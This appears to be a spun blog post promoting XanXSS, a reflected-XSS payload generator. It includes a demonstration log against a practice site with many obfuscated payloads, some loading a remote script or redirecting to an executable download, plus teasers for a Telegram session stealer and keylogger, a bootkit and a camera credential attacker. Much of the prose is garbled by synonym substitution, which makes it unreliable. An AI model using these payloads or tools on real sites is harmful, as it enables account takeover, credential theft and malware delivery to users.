Xanxss - A Unproblematic Xss Finding Tool

XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based from templates. Unlike other XSS scanners that but run through a listing of payloads. XanXSS tries to brand the payload unidentifiable, for example:
<xAnXSS</TitLE></STYLE><SVG/ONload='alERt(1);'/></XaNxSs</titLe></StYlE><SvG/ONlOAD='alerT(1);'/> <ifrAmE&#13;Src=&#160;[2].Find(CoNfirm);=&#160;"JAVaScRIpT:proMpT(1))"javAscrIpt:/*--></scRIPt> />cLIcK&#13;Me!</b</TextaRea></TiTLE><BUTtON ONcLIck='aleRT(1);'/>XaNxss</TEXTaRea> <iMG&#13;sRc=%0acONfIRM();=+'jAVASCRiPT:alerT("XSS");'</STYlE><Svg/onLoad='alErT((1));'/>
With XanXSS every payload is different. XanXSS plant past times running through the payloads until a specified reveal is establish or a timer hits the max time, this prevents it from looping for to long. Some of the features included inwards XanXSS:
  • Ability to transcend your ain headers using -H
  • Ability to generate a polyglot script using -P
  • Ability to run behind a proxy using --proxy
  • And many more

Proof of Concept
For this proof of concept nosotros volition role https://xss-game.appspot.com/level1/frame
admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v       ____  ___             ____  ___  _________ _________     \   \/  /____    ____ \   \/  / /   _____//   _____/      \     /\__  \  /    \ \     /  \_____  \ \_____  \       /     \ / __ \|   |  \/     \  /        \/        \     /___/\  (____  /___|  /___/\  \/_______  /_______  /           \_/    \/     \/      \_/        \/        \/  Twitter->   @stay__salty Github -->  ekultek          Version---> v(0.1)   [info][16:37:34] using default payloads [info][16:37:34] generating payloads [info][16:37:34] running payloads through tampering procedures [info][16:37:34] payloads tampered successfully [info][16:37:34] running payloads [debug][16:37:34] running payload '<xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/   >' [debug][16:37:34] running payload '<SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>' [debug][16:37:34] running payload '<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>' [debug][16:37:34] running payload '<iMG/+/sRc=%0dA=%0DPrOMpt,a(();=%0a'JaVaSCripT:aLeRt("XSS"));'javasCRiPT:/*--></sCRipt>' [debug][16:37:34] running payload '<SCRIPT/*/srC=&#34;&#62;A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js'</TeXTARea></TiTLE><buTTOn oncLiCK='ALeRT(1);'/>XAnXsS</tEXTARea></scrIPTjaVaSCRipT:/*--></sCRIPt>' [debug][16:37:35] running payload '<IMg&#160;SRC=%09CONFIRM(());=%0a'JavAscrIpt:aLERt("XSS");'JavasCrIpT:/*--></SCripT>' [debug][16:37:35] running payload '<XAnXSS</STYlE><SVg/OnLOAd='aLeR   T(1));'/></xAnXsSjaVasCRIpt:/*--></scrIpt>' [debug][16:37:35] running payload '<sCRIPt`Src=+cOnFiRm());=+'htTP://xSs.rOCKs/xsS.js'</TextaREA></tiTle><ButTon ONCliCK='AlErt(1);'/>xanxSS</TeXTarEa></SCriPtJAvaScrIPt:/*--></SCrIpt>' [debug][16:37:35] running payload '<scRIpT</title></stYle><sVG/onlOAD='AlERT(1));'/>aLert((1));</scRipT</titLE></STyLe><sVG/oNlOad='aLeRt((1));'/>' [debug][16:37:35] running payload '<SC\u009lripT/*/SrC=%0aConFirm();=&#160;'hTTP://xsS.ROcks/xSs.js'</TITle></StYlE><svg/ONLOad='ALerT(1);'/></ScriPT</StyLe><svG/OnLOAd='ALert((1);'/>' [debug][16:37:35] running payload '<B//ONMOuSEOver=&#34;&#62;ConFIrm(();=&#160;wIndow.LoCATIoN=&#160\u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--></sCrIPt>ClIcK/*/mE!</b</tiTLe>   </sTyLE><sVG/OnLoAd='aLert(1));'/>' [debug][16:37:35] running payload '<IfRA\u007pmeSrC=%0AcOnFIRm(());=%0a"jaVAScriPT:pRoMPT(1)"jAVaScRIpt:/*--></SCriPt>' [debug][16:37:36] running payload '<IframE//SrC=&#34;&#62;CONfIRM());=%0d"jAvAscriPT:pROMpT(1)"</TeXtarEa></TiTLe><BUttoN oNcliCK='aLERt((1));'/>XanXss</texTAReA>' [debug][16:37:36] running payload '<iMG/+/SRc=%09[3].FInd(COnFIRm));=&#34;&#62;'javAscriPt:A\u004pLerT("XSS");'JavaSCriPt:/*--></sCripT>' [debug][16:37:36] running payload '<imG&#160;SRc=%0d[2].FinD(cOnFiRm));=&#160;'JaVaScRipt:ALERt("XSS"));'</styLe><SVg/oNLoad='ALErT(1));'/>' [debug][16:37:36] running payload '<script</tITLE></style><SVG/onLOAD='alerT(1);'/>AleRt(1);</ScRIpTjAvASCrIPT:/*--></scRIPt>' [debug][16:37:36] running payload '<XaNxSs</tITle></sTYlE><SVg/ONload='aLERT((1);'/><   /xANxsS</stYLE><Svg/OnlOAD='AleRt(1);'/>' [debug][16:37:36] running payload '<b//ONmOUSEoVEr=%0D[8].fInd(coNfIrM);=%09WinDoW.location=%0A(COnfiRm)(();=&#160;'htTPS://MYBadsite.cOM/DoWNlOaD.php?ITEm=+COnFIrM();=+puMPEDupKickS.ExE'</styLe><sVG/OnLOAd='alERt((1);'/>CLickMe!</b</sTYlE><SVG/onloAD='AlERt(1);'/>' [debug][16:37:37] running payload '<scriPT</styLE><SvG/ONloaD='aLERT(1);'/>ALeRt(1);</SCrIPt</tiTLe></STYlE><sVG/OnloAd='aLeRT(1\u009x);'/>' [debug][16:37:37] running payload '<iFRamEsrC=&#34;&#62;[7].FInD(cOnFiRm);=%0A"javAsCRipT:prompt(1))"</tITlE\u009e></sTyle><svg/oNLOad='alert((1);'/>' [debug][16:37:37] running payload '<b/*/OnmOusEOver=&#160;A=%0apROMpt,A();=+wINdOW.LOCAtIon=&#34;&#62;co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=&#34;&#62;puMpedUPKickS.eXe'</teXtaREa></ti   TLe><BUTTON oNclIck='aLeRT((1);'/>XanXsS</texTAREA>cLICk/*/Me!</B</StylE><SVG/ONloAd='aLERt((1));'/>' [debug][16:37:37] running payload '<XANxSSJaVaScRIpt:/*--></SCripT></XAnXSs</TExtAREa></tITle\u008w><b\u009fuTTON oNclIck='Ale\u003rRT((1);'/>xANXss</TEXTArEA>' [debug][16:37:37] running payload '<SCript/*/sRC=+A=&#160;prOmpt,A();=&#160;'HtTp://XsS.rocKS/xsS.JS'</stylE><sVG/onLoad='AlErT((1);'/></SCriptjAvaScriPt:/*--></ScrIpt>' [debug][16:37:37] running payload '<ImG&#13;SRc=&#34;&#62;Co\U006efIr\u006D();=%0a\u007u'javAsCript:AlerT(("XSS");'</titlE></StYLe><svg/onloAD='alERt(1);'/>' [debug][16:37:38] running payload '<B/*/ONmouSeOvEr=%0Aa=&#160;prOmpT,A();=%09WIndOw.LOCAtION=%0Aa=%09prompt,a();=%0A'hTTps://MYBadsITe.COM/DOWNLOAD.PHp?ITeM=&#160;cO\u006Efir\u006D());=%0dPumPeduPkicks.EXE'</tITlE></StyLE><svg   /OnlOAD='aLerT((1));'/>clIcK&#13;mE!</bJavASCript:/*--></sCrIPT>' [warning][16:37:48] times upwards dumping establish [info][16:37:48] working payloads: --------------------------------------------------     > <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>     > <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>     > <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/> -------------------------------------------------- [info][16:37:48] establish a total of iii working payloads admin@TBG-a0216: /bin/python/xanxss$
Now lets banking concern fit those scripts inwards the HTML of the website:
Payload:<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>


Payload: <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>


Payload: <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>


Options
XanXSS comes consummate amongst the mightiness to role a proxy, is compatible amongst proxychains, in addition to allows yous to add together custom headers. I cause got provided a total listing of options for your convience:
usage: xanxss.py [-h] [-u http://test.com/test.php?id=] [-a VERIFY]                  [-f AMOUNT] [-t TIME] [-p SCRIPT, [SCRIPT, ...]]                  [-F FILE-PATH] [-v] [--proxy TYPE://IP:PORT]                  [-H HEADER=VALUE,HEADER:VALUE] [--throttle TIME secs] [-P]  optional arguments:   -h, --help            exhibit this assist message in addition to transcend   -u http://test.com/test.php?id=, --url http://test.com/test.php?id=                         transcend a URL to essay out for XSS vulnerabilities. it is                         recommended that yous role a URL amongst a enquiry parameter   -a VERIFY, --amount VERIFY                         how many verifications steps to travel taken, this volition                         decide how reliable the payload is. the to a greater extent than                         verification steps the to a greater extent than reliable the payload volition                         travel (*default=5)   -f AMOUNT, --find AMOUNT                         a   ttempt to detect this amount of working payloads,                         specifying this does non guarantee yous volition detect this                         amount of working payloads (*default=25)   -t TIME, --time TIME  amount of fourth dimension inwards seconds to pass on testing, this                         volition travel used every bit a timer for the verification                         (*default=35s)   -p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]                         transcend a comma separated listing of your ain payloads, must                         comprise at to the lowest degree v payloads   -F FILE-PATH, --file FILE-PATH                         transcend a textual file containing payloads i per line,                         must comprise at to the lowest degree v payloads   -v, --verbose         run inwards verbose agency in addition to display to a greater extent than output                         (*default=False)   --proxy TYPE://IP:PORT                         transcend a proxy inwards the format type://ip:port   -H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE                         add together your ain custom headers to the asking                         (*default=connection,user-agent)   --throttle TIME (secs)                         bound each asking amongst a slumber fourth dimension (*default=0)   -P, --polyglot        generate a polyglot script to append to the halt of the                         running scripts, if at that spot is XSS this should detect it                         (*default=False)


Popular posts from this blog

Telekiller - A Tool Session Hijacking In Addition To Stealer Local Passcode Telegram Windows

Image
H5N1 Tools Session Hijacking And Stealer Local passcode Telegram Windows. Features : Session Hijacking Stealer Local Passcode Keylogger Shell Bypass ii Step Verification Bypass Av (Coming Soon) Installation Windows git clone https://github.com/ultrasecurity/TeleKiller.git cd TeleKiller pip install -r requirements.txt python TeleKiller.py Dependency : python 2.7 pyHook pywin32 Video Tutorial Operating Systems Tested Windows 10 Windows 8.1 Windows 8 Windows 7 Contact WebSite Ultra Security Team: https://ultrasec.org Channel Telegram: https://t.me/UltraSecurity Thanks to Milad Ranjbar MrQadir Download TeleKiller
Read more

Efiguard - Disable Patchguard Together With Dse At Kicking Time

Image
EfiGuard is a portable x64 UEFI bootkit that patches the Windows kicking manager, kicking loader too center at kicking fourth dimension inward club to disable PatchGuard too Driver Signature Enforcement (DSE). Features Currently supports all EFI-compatible versions of Windows x64 e'er released, from Vista SP1 to Server 2019. Easy to use: tin live on booted from a USB stick via a loader application that automatically finds too boots Windows. The driver tin also live on loaded too configured manually using either the UEFI rhythm out or the loader. Makes extensive utilization of the Zydis disassembler library for fast runtime pedagogy decoding to back upwardly to a greater extent than robust analysis than what is possible amongst signature matching, which oftentimes requires changes amongst novel OS updates. Works passively: the driver does non charge or start the Windows kicking manager. Instead it acts on a charge of bootmgfw.efi yesteryear the firmware kicking ...
Read more

Cameradar V2.1.0 - Hacks Its Mode Into Rtsp Videosurveillance Cameras

Image
   An RTSP flow access tool that comes alongside its library Cameradar allows you lot to Detect opened upward RTSP hosts on whatever accessible target host Detect which device model is streaming Launch automated dictionary attacks to larn their stream route (e.g.: /live.sdp ) Launch automated lexicon attacks to larn the username in addition to password of the cameras Retrieve a consummate in addition to user-friendly study of the results Docker Image for Cameradar Install docker on your machine, in addition to run the next command: docker run -t ullaakut/cameradar -t <target> <other command-line options> See command-line options . e.g.: docker run -t ullaakut/cameradar -t 192.168.100.0/24 -l volition scan the ports 554 in addition to 8554 of hosts on the 192.168.100.0/24 subnetwork in addition to laid on the discovered RTSP streams in addition to volition output debug logs. YOUR_TARGET tin hold out a subnet (e.g.: 172.16.100.0/24 )...
Read more